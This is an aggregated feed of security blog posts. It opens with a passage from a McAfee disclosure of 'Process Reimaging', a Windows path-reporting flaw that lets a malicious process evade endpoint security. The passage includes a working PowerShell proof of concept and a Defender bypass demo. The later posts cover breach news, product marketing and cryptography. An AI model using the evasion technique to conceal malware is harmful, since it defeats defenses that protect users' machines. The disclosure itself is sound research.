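The three-step sequence above, as an added PowerShell example (not the post's code): a copy of version.dll in a scratch directory stands in for the payload DLL, it is loaded and freed, the directory is renamed so the same file on disk gets a new path, and the file is loaded again through that new path. The HMODULE returned by LoadLibrary is the base address of the mapping, so it can be passed straight to GetMappedFileName to read the path the VAD's FILE_OBJECT carries. The P/Invoke declarations are the documented Win32 prototypes; the class name ImgReuse, the helper Get-MappedFileName and the dirA/dirB paths are my own.

```powershell
# Added example, not code from the McAfee post: LoadLibrary / FreeLibrary / rename / LoadLibrary,
# then ask GetMappedFileName where the reloaded image lives.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class ImgReuse
{
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern IntPtr LoadLibrary(string path);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool FreeLibrary(IntPtr hModule);
    [DllImport("kernel32.dll")]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("psapi.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern uint GetMappedFileName(IntPtr hProcess, IntPtr addr, StringBuilder name, uint size);
}
'@

function Get-MappedFileName([IntPtr]$Address) {
    $sb = New-Object System.Text.StringBuilder 1024
    [void][ImgReuse]::GetMappedFileName([ImgReuse]::GetCurrentProcess(), $Address, $sb, $sb.Capacity)
    $sb.ToString()
}

$root = Join-Path $env:TEMP 'reuse'                       # hypothetical scratch location
$dirA = Join-Path $root 'dirA'; $dirB = Join-Path $root 'dirB'
New-Item -ItemType Directory -Force -Path $dirA | Out-Null
# A benign DLL with no dependencies beyond kernel32/ntdll stands in for the payload DLL.
Copy-Item "$env:SystemRoot\System32\version.dll" (Join-Path $dirA 'payload.dll')
try {
    # Steps 1 and 2: load and free. Per the post, the image FILE_OBJECT stays cached in the process.
    $h = [ImgReuse]::LoadLibrary((Join-Path $dirA 'payload.dll'))
    if ($h -eq [IntPtr]::Zero) { throw "LoadLibrary failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    [void][ImgReuse]::FreeLibrary($h)

    # Rename the filepath (same file on disk, new directory), then step 3: load through the new path.
    Rename-Item -Path $dirA -NewName 'dirB'
    $h = [ImgReuse]::LoadLibrary((Join-Path $dirB 'payload.dll'))
    if ($h -eq [IntPtr]::Zero) { throw "LoadLibrary failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }

    # HMODULE == mapping base address, so GetMappedFileName can be asked about it directly.
    $reported = Get-MappedFileName $h
    "On disk:            $(Join-Path $dirB 'payload.dll')"
    "GetMappedFileName:  $reported"
    if ($reported -like '*\dirA\*') { 'STALE: the VAD still points at the pre-rename FILE_OBJECT (Process Reimaging)' }
    else                            { 'current: this build refreshed the FILE_OBJECT path at load time' }
    [void][ImgReuse]::FreeLibrary($h)
} finally {
    Remove-Item -Recurse -Force $root -ErrorAction SilentlyContinue
}
```

Per the post this prints STALE on every Windows version tested; a build that has since applied the FILE_OBJECT verification recommended under "Mitigations recommended to Microsoft" below would print the second line instead. Dropping a fresh copy of the file into the new directory instead of renaming does not trigger the reuse, which is the second prerequisite listed above.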

The Process Reimaging technique can be used in two ways with the LoadLibrary FILE_OBJECT reuse attack vector:

  1. LoadLibrary (see figure 9 below)
    1. When an ESS or application calls the GetMappedFileName API to retrieve the path of a memory-mapped image file, Process Reimaging causes Windows to return the pre-rename path. This affected all Windows OS versions at the time of testing.

Figure 9 LoadLibrary FILE_OBJECT Reuse (LoadLibrary) – Process Reimaging Technique Using LoadLibrary Impacts all Windows OS Versions

  2. CreateProcess (see figure 10 below)
    1. When an ESS or application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging causes Windows to return the pre-rename path. This affected all Windows OS versions at the time of testing.

Figure 10 LoadLibrary FILE_OBJECT Reuse (CreateProcess) – Process Reimaging Technique using CreateProcess Impacts all Windows OS Versions

Process Manipulation Techniques Comparison

Windows Defender Process Reimaging Filepath Bypass Demo

This video simulates zero-day malware (a Mimikatz PUP sample) being dropped to disk and executed as the malicious process "phase1.exe". Using the Process Reimaging filepath attack vector, we demonstrate that even after Defender is updated with a signature for the malware on disk, it does not detect the running malicious process. For non-EDR ESSs such as Defender Real-time Protection (used by consumers and also enterprises), the malicious process can therefore dwell on a Windows machine until a reboot or until the machine receives a full scan after the signature update.

CVSS and Protection Recommendations

CVSS

If a product uses any of the APIs listed in Table 1 for the following use cases, then it is likely vulnerable:

  1. Process reputation of a remote process: any product using the APIs to determine whether executing code comes from a malicious file on disk.

CVSS score 5.0 (Medium)  https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N (same score as Doppelganging)

  2. Trust verification of a remote process: any product using the APIs to verify the trust of a calling process.

CVSS score will be higher than 5.0; the exact score depends on the Endpoint Security Solution architecture.

Protection Recommendations

McAfee Advanced Threat Research submitted Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 Cumulative update for the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions.

New and existing Process Manipulation techniques which abuse legitimate Operating System features for defense evasion are difficult to prevent dynamically by monitoring specific API calls as it can lead to false positives such as preventing legitimate processes from executing.

A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan which may provide deeper insight.

Mitigations recommended to Microsoft
  1. File System Synchronization (EPROCESS structures are out of sync with the filesystem / File Control Block (FCB) structure)
    1. Allow the EPROCESS structure fields to reflect filepath changes, as is currently done for the filename in the VADs and the EPROCESS ImageFilePointer field.
    2. There are other EPROCESS fields which do not reflect filename changes and need to be updated in the same way, so that every API in Table 1 (not only K32GetModuleFileNameEx on Windows 10, which goes through the ImageFilePointer) sees the change.
  2. API Usage (most of these APIs return file information as of process creation time)
    1. Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get the process image filename and path; it should be using K32GetModuleFileNameEx.
    2. Consolidate the duplicate APIs exposed on top of NtQueryInformationProcess to give easier management and clearer guidance to consumers that need process filename information (for example, state clearly that GetMappedFileName should only be used for DLLs and not for the EXE backing a process).
    3. State in each API's description whether it returns the filename and path as of process creation or as of the time of the request.
  3. Filepath Locking
    1. Lock the filepath and filename while a process is executing, in the same way that modification of the file itself is locked.
    2. At a minimum, a standard user should not be able to rename the binary path of its own executing process.
  4. Reuse of an existing FILE_OBJECT by the LoadLibrary API (prevent Process Reimaging)
    1. LoadLibrary should verify that any existing FILE_OBJECT it reuses carries the current filepath at load time.
  5. Short term: Defender should at least flag that it found malicious process activity but could not find the associated malicious file on disk (right now it fails open and gives no notification of a potential threat found in memory or on disk).

Mitigation recommended to Endpoint Security Vendors

The FILE_OBJECT ID must be tracked from FileCreate as the process closes its handle for the filename by the time the image is loaded at ImageLoad.

This ID must be managed by the Endpoint Security Vendor so that it can be leveraged to determine if a process has been reimaged when performing process attribute verification.

The post In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass appeared first on McAfee Blogs.

Make Seqrite UTM the first line of defense for your enterprise

Estimated reading time: 2 minutes

Network security has traditionally been a number one priority for enterprises. As reliance on the Internet has increased, enterprises have invested in traditional network security solutions that aim to protect trusted internal networks from external actors. For this purpose, enterprises have invested in solutions like a firewall that stands at the perimeter of a company's network and monitors and controls incoming and outgoing network traffic. Similarly, organizations have also invested in Unified Threat Management (UTM) solutions, which combine and integrate multiple security devices for protection.

Enterprises can consider Seqrite’s Unified Threat Management (UTM) which combines multi-layered cybersecurity strategies for businesses, thereby safeguarding the entire IT framework while rendering it productive, secure and stable. Seqrite is one reliable security service provider that offers UTM as a gateway security solution. Seqrite’s UTM offers a host of features for enterprises in areas of networking, administration, content filtering, VPN, monitoring and reporting, mail protection, firewall, security services and user authentication.

Unified Threat Management is a holistic service that brings together features such as content filtering, VPN, firewall and anti-virus protection under a single dashboard. Some of the key features of UTM which can serve as the first line of defense for your enterprise are:

  • Gateway Antivirus

The Gateway Antivirus feature scans all incoming and outgoing network traffic at the gateway level. This helps to augment existing virus solutions by reducing the window of vulnerability (WoV) as threats are detected and dealt with right at the network level, hence preventing their entry into the rest of the enterprise.

  • IPS

Through the Intrusion Prevention System (IPS) feature, network traffic is scanned in real time. This helps prevent a broad range of Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks before they can penetrate the network. Administrators can also configure IPS rules, policies and the actions to take when these alarms are raised.

  • Firewall Protection

With the best-in-class firewall protection, network administrators can permit or block access for traffic between internal and external networks based on enterprise compliance policies.

  • URL Filtering

When it comes to selecting a functional UTM solution, spam blocking and URL filtering need to be prioritized. These components are the building blocks of an enterprise-level network security solution and a key feature within reliable UTM products. URL filtering helps block risky websites and when paired with spam filtering, can also block the entry of spam mails and certain forms of phishing attacks. Seqrite UTM’s URL Filtering feature allows blocking of non-business related web traffic including streaming media sites, downloads, instant messaging etc. in order to reduce unnecessary load on enterprise bandwidth.

  • Gateway Mail Protection

Thanks to the Gateway Mail Protection features, enterprises can be sure that they are protected from malicious emails and Business Email Compromise (BEC) attacks. This feature scans incoming/outgoing emails or attachments at the gateway level to block spam and phishing emails before they enter the network.

  • Load Balancing

This feature allows the distribution of bandwidth across multiple ISPs within the enterprise network and enables these ISPs to operate over the same gateway channels. Multiple ISPs can be used by Seqrite UTM through this feature. Traffic is balanced across multiple ISP lines based on weightage and priority.

The above pointers make it quite clear why Seqrite Unified Threat Management (UTM) has the power and tools required for enterprises to make it their first line of defense against cyber attacks.

The post Make Seqrite UTM the first line of defense for your enterprise appeared first on Seqrite Blog.

Medical debt collection agency files for bankruptcy protection after data breach

A US medical bill and debt collection agency has filed for Chapter 11 bankruptcy protection after suffering a data breach that exposed the sensitive personal data of at least 20 million people.

Compromised data included names, addresses, dates of birth and Social Security numbers – data that could be used to commit fraud and identity theft.

RMCB (the Retrieval-Masters Creditors Bureau) – the parent company of AMCA (the American Medical Collection Agency) – listed assets and liabilities of up to $10 million and estimated that it had between 100 and 199 creditors.

The company’s founder and CEO Russell H. Fuchs said in a court declaration that the breach had prompted a “cascade of events” resulting in “enormous expenses that were beyond [its] ability […] to bear”.

These included spending more than $3.8 million on notifying more than 7 million individuals that their personal data had potentially been compromised – $2.5 million of which Fuchs loaned the company himself.

Chapter 11 filings help businesses restructure their debts and assets, and wind up their affairs in an orderly manner.

Undetected data breach

AMCA was hacked over an eight-month period from 1 August 2018 to 30 March 2019.

Gemini Advisory, which alerted it to the incident, explains that it first identified information stolen from the company on 28 February.

The next day, it “made several unsuccessful attempts to contact AMCA in order to alert the victims” before informing federal law enforcement.

Databreaches.net first reported the incident on 10 May, using information provided by Gemini Advisory, but was unable to elicit any comment from AMCA.

Customer data exposed

According to ZDNet, companies that used AMCA’s payment portal to bill their medical customers include Quest Diagnostics (12 million exposed records), LabCorp (8 million), BioReference Laboratories (423,000), Carecentrix (500,000) and Sunrise Laboratories (unknown number).

All have either “terminated or substantially curtailed their business relationships” with AMCA, Fuchs said.

The real price of a data breach

RMCB/AMCA has been in business since 1977. Following the breach, it was forced to reduce its headcount by 88 to 25. Moreover, it is not “optimistic that it will be able to rehabilitate its business”.

After more than 40 years, this will be a bitter blow.

The lesson to be learned is that all organisations are at risk from cyber attacks and that the results can be disastrous.

Defending against cyber attacks is therefore critical.

Cyber security boot camp

If you need to improve your cyber security quickly, you can get all the support you need on our cyber security boot camp.

Download our free Cyber Security Combat Plan and discover:

  • The five defensive measures you should take to protect your organisation from cyber attacks;
  • The benefits and the risks associated with each of them; and
  • How to build a business case for implementing them.

Enlist now >>

Cyber Security boot camp

The post Medical debt collection agency files for bankruptcy protection after data breach appeared first on IT Governance Blog.

Welcoming Cloudbric’s new CSO for strategic planning and investor relations

We’re excited to announce that Yujin (Gin) Hyeon has joined Cloudbric as Chief Strategic Officer (CSO).

As Cloudbric’s new CSO, Gin will be driving corporate strategy and investor relations to take the next big step forward. As a veteran of the tech industry, Gin’s experience with early stage companies from growth stage to IPOs will be pivotal for Cloudbric’s continued development. Given his track record, we are very excited to have him join our roster.

To give some background, Gin was a Co-Founder of Com2uS, one of the world’s first mobile gaming companies, which was established in 1996 and known for games like Summoners War: Sky Arena, Ace Fishing, Golf Star, and Tiny Farm.

His role was twofold, with one hand on the business side and the other on product development. On the business side Gin was focused on acquiring funding for the team and expanding business overseas, including the opening of regional offices in London, Bangalore, Los Angeles and Singapore.

On the product development end, he helped the company achieve its strategic goals and moved product development by co-developing the product lineup.

Some highlights while working with Com2uS include developing and negotiating contractual agreements with license holders, mobile telecommunications carriers, and other strategic partners, successfully completing agreements with 64 mobile telecommunications operators in 32 countries.

Notably, he also developed strategic partnerships with Samsung Electronics, Nokia, Motorola, Sony Ericsson, Siemens, Sun Microsystems, Qualcomm, and YAHOO.

It doesn’t end with just Com2uS!

Gin worked for INKA ENTWORKS, which specializes in security solutions and is known worldwide as one of the leading DRM (Digital Rights Management) technology companies.

With the launch of AppSealing, a software that prevents hacking for mobile applications, Gin, as Senior VP, oversaw the strategic and business plans for the solution all while implementing a China strategy before launching it into an incubation program.

He also worked for a company called ASCAN, a document management and record archiving company based in Korea that uses AI, serving as COO.

In between balancing both operating and strategic planning, Gin also helped acquire overseas funding for the company.

Amongst his experience in the tech industry, Gin has accumulated over 15 years of experience in consulting and grant writing too.

He has worked in consulting for companies like Fairways Consulting Services (a company focused on preparing businesses to enter the Indian market) and Brilliant Rise, a Hong Kong based company composed of former executives in the various fields of technology and internet to provide consulting services, project management, and merger & acquisition services.

Most recently, as the previous CSO of the Korean product design and development startup PiQuant, he oversaw the investor relations side of the business and its strategic partnerships.

With his extensive experience in building company strategies across various industries and his huge investor network, we are excited to bring in Gin to the team as someone who can help us continue to grow.

Gin is joining the team at a time in which Cloudbric is seeing a 50% increase in the company’s workforce.

Welcome

환영합니다

स्वागत

Bienvenue Gin!

(Though a Korean national, Gin spent a total of 32 years in India. He speaks a total of five languages! English, Korean, Hindi, French, and Spanish).

Furthermore, as a company, we’re excited to continue growing and in various industries as well.

Recently, Cloudbric began providing security services to cryptocurrency exchanges and blockchain businesses, and has now moved into the operation of blockchain wallet nodes, utilizing its know-how in cloud computing services like AWS and others.

We aim to build blockchain nodes in our existing data centers and servers around the world to grow this business.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Welcoming Cloudbric’s new CSO for strategic planning and investor relations appeared first on Cloudbric.

Upcoming cybersecurity events featuring BH Consulting

Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy. 

ISACA Last Tuesday: Dublin, 25 June

BH Consulting COO Valerie Lyons will present a talk on building an emotionally intelligent security team, and the role that leadership plays in influencing team style. It will be an interactive and fun session with several takeaways and directions to free online tools to help analyse team member roles. The evening event will take place at the Carmelite Community Centre on Aungier Street in Dublin 2. Attendance is free; to register, visit this link

Data Protection Officer certification course: Vilnius/Maastricht June/July

BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here

IAM Annual Conference: Dublin, 28-30 August

Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

Collections Firm Behind LabCorp, Quest Breaches Files for Bankruptcy

A medical billing firm responsible for a recent eight-month data breach that exposed the personal information on nearly 20 million Americans has filed for bankruptcy, citing “enormous expenses” from notifying affected consumers and the loss of its four largest customers.

The filing, first reported by Bloomberg, comes from the Retrieval-Masters Creditors Bureau, the parent company of the American Medical Collection Agency (AMCA). Earlier this month, medical testing firm Quest Diagnostics said a breach at the AMCA between Aug. 1, 2018 and March 30, 2019 led to the theft of personal and medical information on 11.9 million patients.

On June 4, KrebsOnSecurity broke the news that another major AMCA client — LabCorp — was blaming the company for a breach affecting 7.7 million of its patients.

According to a bankruptcy filing, LabCorp and Quest Diagnostics both stopped sending the AMCA business after the breach disclosure, as did the AMCA’s two other biggest customers — Conduent Inc. and CareCentrix Inc.

Bloomberg reports the data breach created a “cascade of events,” which incurred “enormous expenses that were beyond the ability of the debtor to bear.”

“Those expenses included more than $3.8 million spent on mailing more than 7 million individual notices to people whose information had been potentially hacked,” wrote Jeremy Hill. Retrieval Masters CEO Russell H. Fuchs “personally lent the company $2.5 million to help pay for those mailings, he said in the declaration. In addition, IT professionals and consultants hired in connection with the breach had cost Retrieval-Masters about $400,000 by the time of the filing.”

Retrieval Masters said it learned of the breach after a significant number of credit cards people used to pay their outstanding medical bills via the company’s site ended up with fraud charges on them soon after. The company also reportedly slashed its staff from 113 to 25 at the end of 2018.

The bankruptcy filing may also be something of a preemptive strike: Retrieval-Masters is already facing at least three class-action lawsuits from plaintiffs in New York and California.

A copy of the bankruptcy filing is available here (PDF).

Live From Gartner Security & Risk Mgmt Summit: How to Approach Container Security

Container security is a topic most security practitioners still find confusing. It's a new technology that's spreading fast because of its numerous benefits, and its security implications and solutions are evolving just as fast.

That’s why I really appreciated Anna Belak’s session “Container Security – From Image Analysis to Network Segmentation” at the Gartner Security & Risk Management Summit in National Harbor, MD. Anna provided a great framework for thinking about container security that I would like to share with you.

Divide and Conquer: Images, Orchestration, Runtime

After introducing the audience to all of the security challenges and attack vectors for containers, she broke down a container security program into three sections:

  • Securing container images
  • Securing the orchestration plane 
  • Securing containers at runtime 

Today, there’s no security vendor that helps with all three of these areas. Because Veracode focuses on application development security, we focus on securing container images, not the operational parts.

Inside the Sausage Factory: How the Docker Image is Made

A Docker container image is a lightweight, standalone, executable package of software that includes everything you need to run an application: code, runtime, system tools, system libraries and settings. Docker's run command is what actually launches a container. Each container is an instance of an image, and multiple container instances of the same image can run simultaneously. Containers are ephemeral: container deployments are in constant flux, and the average lifetime of a container is 30 minutes.

The Docker Hub registry is a repository for sharing container images from open source projects and from software vendors. These images are leveraged by developers – often introducing additional risk to the organization.

In her talk, Anna referenced a study of 3,802 official images on the Docker Hub that found a median of 127 vulnerabilities per image. Even more shocking: There were zero images that did not have any vulnerabilities.

Gartner’s Top Recommendations on Container Security

The talk closed with three recommendations:

  • Secure containers holistically by integrating controls at key steps in the CI/CD pipeline. Focusing solely on runtime controls, as you would for software installed on VMs, will leave you vulnerable on many fronts.
  • Use secrets management and software component analysis as primary container protection strategies. Add Layer 7 network segmentation for operational containers that require defense in depth.
  • Select vendors that can integrate with the container offerings of leading cloud service providers, such as Amazon Web Services, Microsoft Azure, and Google Cloud Platform.

Veracode can help you with the first recommendation: Veracode Software Composition Analysis scans container images for vulnerabilities as part of your CI/CD pipeline to help you find vulnerabilities in the production image. If you’re interested in more information, read our blog post How Veracode Scans Docker Containers for Open Source Vulnerabilities

Embracing the “Sec” in DevSecOps: How Veracode and AWS Work Together to Help You Build Secure Apps

Developers, like most builders, are creative critical thinkers who take pride in their work. Let's focus on the word "builder" for a moment. During the industrial revolution, we saw a shift in manufacturing where time-consuming processes were made more efficient through automation. With that, we also saw the concept of an assembly line and interchangeable parts transform businesses. The idea was to build as quickly as possible for less cost. Transpose this to software engineering and we see a similar trend: building software as quickly as possible, using components, and decreasing costs. Implicit in this is the direct correlation between the quality of the components and the quality of the final product. This begs the question: why then are developers selecting poor or insecure components to build their applications? I would argue that the intention to build stable and secure software has always existed, but there is a general lack of awareness and overall confusion about the best approach. We need only look at the latest headlines and read about Fortune 500 companies that have been victims of vulnerabilities despite their best efforts to ship software they thought to be secure. So, how does intent go beyond a mere idea and get put into design and practice to mitigate these concerns in the most comprehensive and reliable way possible?

Before we are able to answer that, it is important that we consider a few facts:

  1. Modern applications are complex and made up of various components.
  2. Open source has grown and has found its way into millions of applications across various industries spanning private, public, and even government sectors.
  3. Application security has traditionally been reactive and found later in the development life cycle.

Cloud adoption has made it easier for developers to be empowered to not only build their application, but also provision its supporting infrastructure. Take for example a fully-managed CI/CD pipeline on AWS comprised of AWS CodeCommit, AWS CodePipeline, and AWS CodeBuild with container deployments to AWS Fargate. If you find yourself in a similar scenario or aspire to migrate to AWS to use these services, then which tools do you use, and how do you leverage those correctly to ensure that you are building secure applications? If you are using open source components, then how do you ensure that you are using the right versions of components, or find out where those are being downloaded from? These questions extend to your container images as well. Container images are often opaque in that they typically contain various layers, but it is not immediately clear what security vulnerabilities may be contained within each of those respectively. Are you including inspection of these into your automated workflows?

One of the more prominent blockers to applying security is the perception that doing so will undoubtedly negatively impact time to market. Developers are often under time constraints and are focused on building applications and releasing features as expeditiously as possible. This coupled with the complexity of modern architectures, use of external components and lack of prescriptive guidance on leveraging the right tools at the appropriate stage of the development life cycle leads to exacerbating frustration and the expected reaction is one of avoidance. In other words, we acknowledge the problem, vaguely understand there may be a way or ways to resolve it, but are not clear on how to accomplish that and determine it’s not worth the effort today, after all, there’s always tomorrow.

The truth is that this need not be as daunting as it may seem on the surface. The journey begins with understanding your process and gaining insights into your environment. If you don’t know where your vulnerabilities exist today, then how can you effectively solve them? Second, it’s about applying security at every stage of the process. There are several tools that address specific concerns and were built for specific audiences: Security teams, AppSec teams, Dev teams. Use them accordingly. For example, there is a place for static analysis (SAST), software composition analysis (SCA), dynamic analysis (DAST) testing and monitoring tools designed for finding security defects and completing the feedback loop. It’s critical to understand that you may build a secure application today, but can you quickly iterate and resolve for those vulnerabilities that have yet to be discovered before they negatively impact your business or your customers? These are considerations that are necessary for any business to survive in today’s competitive landscape. Sure, you need to ship features as quickly as possible, but you need to do so without compromising security.

This is where solutions such as those available today from Veracode are integral for any business. Veracode is a full spectrum application security testing solution that begins with Veracode Greenlight in the developers' IDE and spans the development lifecycle through to Veracode Manual Penetration Testing. Along the way, you are covered throughout the entire software development life cycle. From the moment developers begin writing code and pushing commits, Veracode Software Composition Analysis (SCA) identifies any open source vulnerability and provides crisp remediation guidance. Integrate Veracode Static Analysis (SAST) into your build and test tools and processes to quickly identify security flaws in your code. Lastly, Veracode Dynamic Analysis (DAST) in your release, deployment and operations process reduces your risk of a breach once your application goes live. These are easily integrated with AWS CodePipeline and CodeBuild to secure your fully managed CI/CD pipelines running in the AWS cloud.

As the complexity of modern applications continues to increase over the years, so too does introducing security into every stage of your development life cycle become a necessity. We live in a highly competitive world with a voracious appetite for innovation. It is critical for businesses to deliver quickly and satisfy customer demand, but equally critical to ensure and preserve customer trust. It is possible to do both without compromising one for the other, and the solutions exist today.

Learn more at AWS re:Inforce this month in Boston – Veracode will be at Booth 813, and speaking on Wednesday the 26th on “Integrating AppSec Into Your DevSecOps on AWS.”

Expanding Our Vision to Expand the Cybersecurity Workforce

I recently had the opportunity to testify before Congress on how the United States can grow and diversify the cyber talent pipeline. It’s great that members of Congress have this issue on their radar, but at the same time, it’s concerning that we’re still having these discussions. A recent (ISC)² study puts the global cybersecurity workforce shortage at 2.93 million. Solving this problem is challenging, but I offered some recommendations to the House Homeland Security Committee’s Subcommittee on Cybersecurity, Infrastructure Protection and Innovation.

Increase the NSF CyberCorps Scholarships for Service Program

The National Science Foundation (NSF) together with the Department of Homeland Security (DHS) designed a program to attract more college students to cybersecurity, and it’s working. Ten to 12 juniors and seniors at each of the approximately 70 participating institutions across the country receive free tuition for up to two years plus annual stipends. Once they’ve completed their cybersecurity coursework and an internship, they go to work for the federal government for the same amount of time they’ve been in the program. Afterwards, they’re free to remain federal employees or move elsewhere, yet fortunately, a good number of them choose to stay.

Congress needs to increase the funding for this program (which has been flat since 2017) from $55 million to at least $200 million. Today the scholarships are available at 70 land grant colleges. The program needs to be opened up to more universities and colleges across the country.

Expand CyberCorps Scholarships to Community Colleges

Community colleges attract a wide array of students – a fact that is good for the cybersecurity profession. Some community college attendees are recent high school graduates, but many are more mature, working adults or returning students looking for a career change or skills training. A strong security operation requires differing levels of skills, so having a flexible scholarship program at a community college could not only benefit graduates but also provide the profession with necessary skills.

Furthermore, not everyone in cybersecurity needs a four-year degree. In fact, they don’t need to have a traditional degree at all. Certificate programs provide valuable training, and as employers, we should change our hiring requirements to reflect that reality.

Foster Diversity of Thinking, Recruiting and Hiring

Cybersecurity is one of the greatest technical challenges of our time, and we need to be as creative as possible to meet it. In addition to continually advancing technology, we need to identify people from diverse backgrounds – and not just in the standard sense of the term. We need to diversify the talent pool in terms of race, ethnicity, gender and age, all of which lead to creating an inclusive team that will deliver better results. However, we also should seek out gamers, veterans, people working on technical certificates, and retirees from computing and other fields such as psychology, liberal arts as well as engineering. There is no one background required to be a cybersecurity professional. We absolutely need people with deep technical skills, but we also need teams with diverse perspectives, capabilities and levels of professional maturity.

Public-Private Sector Cross Pollination

We also must develop creative approaches to enabling the public and private sectors to share talent, particularly during significant cybersecurity events. We should design a mechanism for cyber professionals – particularly analysts or those who are training to become analysts – to move back and forth between the public and private sector so that government organizations would have a continual refresh of expertise. This type of cross-pollination would help everyone share best practices on technology, business processes and people management.

One way to accomplish this would be for DHS to partner with companies and other organizations such as universities to staff a cadre of cybersecurity professionals – operators, analysts and researchers – who are credentialed to move freely between public and private sector service. These professionals, particularly those in the private sector, could be on call to help an impacted entity and the government respond to a major attack in a timely way. Much like the National Guard, a flexible staffing approach to closing the skills gap could become a model of excellence.

We’re Walking the Talk

McAfee is proud to support the community in establishing programs that provide skills to help build the STEM pipeline, fill related job openings, and close gender and diversity gaps. These programs include an Online Safety Program, onsite training programs and internships for high school students. Our employees also volunteer in schools to help educate students on both cybersecurity risks and opportunities. Through volunteer-run programs across the globe, McAfee has educated more than 500,000 children to date.

As part of McAfee’s new pilot Achievement & Excellence in STEM Scholarship program, we’ll make three awards of $10,000 for the 2019-2020 school year. Twelve students from each of the three partner schools will be invited to apply, in coordination with each partner institution’s respective college advisor. Target students are college-bound high school seniors with a demonstrated passion for STEM fields who are seeking a future in a STEM-related path. This type of program can easily be replicated by other companies and used to support the growth and expansion of the workforce.

We’re Supporting Diversity

While we recognize there is still more to do in fostering diversity, we’re proud to describe the strides we’re making at McAfee. We believe we have a responsibility to our employees, customers and communities to ensure our workplace reflects the world in which we live. Having a diverse, inclusive workforce is the right thing to do, and after we became an independent, standalone cybersecurity company in 2017, we made and have kept this a priority.

The steps we’re taking include:

  • Achieving pay parity between women and men employees in April 2019, making us the first pureplay cybersecurity company to do so.
  • In 2018, 27.1% of all global hires were female and 13% of all U.S. hires were underrepresented minorities.
  • In June 2018, we launched our “Return to Workplace” program for men and women who have paused their career to raise children, care for loved ones or serve their country. The 12-week program offers the opportunity to reenter the tech space with the support and resources needed to successfully relaunch careers.
  • Last year, we established the Diversity & Culture Council, a volunteer-led global initiative focused on creating an infrastructure for the development and maintenance of an integrated strategy for diversity and workplace culture.
  • McAfee CEO Chris Young joined CEO Action for Diversity & Inclusion, the largest group of CEOs and presidents committed to taking action to drive an inclusive workforce. By taking part in CEO Action, Young personally commits to advancing diversity and inclusion through the coalition’s three-pronged approach of fostering safe workplaces.

Looking to the Future

While I’d love to see a future where fewer cybersecurity professionals were needed, I know that for the foreseeable future, we’ll not only need great technology but also talented people. With that reality, we in the industry need to expand our vision and definition of what constitutes cybersecurity talent. The workforce shortage is such that we have to expand our concepts and hiring requirements. In addition, the discipline itself will benefit from a population that brings more experiences, skills and diversity to bear on a field that is constantly changing.

The post Expanding Our Vision to Expand the Cybersecurity Workforce appeared first on McAfee Blogs.

Helping organizations do more without collecting more data



We continually invest in new research to advance innovations that preserve individual privacy while enabling valuable insights from data. Earlier this year, we launched Password Checkup, a Chrome extension that helps users detect if a username and password they enter on a website has been compromised. It relies on a cryptographic protocol known as private set intersection (PSI) to match your login’s credentials against an encrypted database of over 4 billion credentials Google knows to be unsafe. At the same time, it ensures that no one – including Google – ever learns your actual credentials.

Today, we’re rolling out the open-source availability of Private Join and Compute, a new type of secure multi-party computation (MPC) that augments the core PSI protocol to help organizations work together with confidential data sets while raising the bar for privacy.


Collaborating with data in privacy-safe ways

Many important research, business, and social questions can be answered by combining data sets from independent parties where each party holds their own information about a set of shared identifiers (e.g. email addresses), some of which are common. But when you’re working with sensitive data, how can one party gain aggregated insights about the other party’s data without either of them learning any information about individuals in the datasets? That’s the exact challenge that Private Join and Compute helps solve.

Using this cryptographic protocol, two parties can encrypt their identifiers and associated data, and then join them. They can then do certain types of calculations on the overlapping set of data to draw useful information from both datasets in aggregate. All inputs (identifiers and their associated data) remain fully encrypted and unreadable throughout the process. Neither party ever reveals their raw data, but they can still answer the questions at hand using the output of the computation. This end result is the only thing that’s decrypted and shared in the form of aggregated statistics. For example, this could be a count, sum, or average of the data in both sets.


A deeper look at the technology 


Private Join and Compute combines two fundamental cryptographic techniques to protect individual data:

  • Private set intersection allows two parties to privately join their sets and discover the identifiers they have in common. We use an oblivious variant which only marks encrypted identifiers without learning any of the identifiers.
  • Homomorphic encryption allows certain types of computation to be performed directly on encrypted data without having to decrypt it first, which preserves the privacy of raw data. Throughout the process, individual identifiers and values remain concealed. For example, you can count how many identifiers are in the common set or compute the sum of values associated with marked encrypted identifiers – without learning anything about individuals. 

This combination of techniques ensures that nothing but the size of the joined set and the statistics (e.g. sum) of its associated values is revealed. Individual items are strongly encrypted with random keys throughout and are not available in raw form to the other party or anyone else.
